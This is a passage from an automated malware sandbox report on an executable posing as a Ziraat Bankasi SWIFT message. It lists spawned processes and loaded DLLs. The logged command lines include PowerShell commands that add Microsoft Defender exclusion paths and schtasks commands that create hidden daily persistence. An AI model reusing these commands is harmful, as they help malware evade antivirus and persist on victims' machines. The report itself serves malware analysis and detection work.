Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:07 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:07 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp"
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: cryptbase.dll
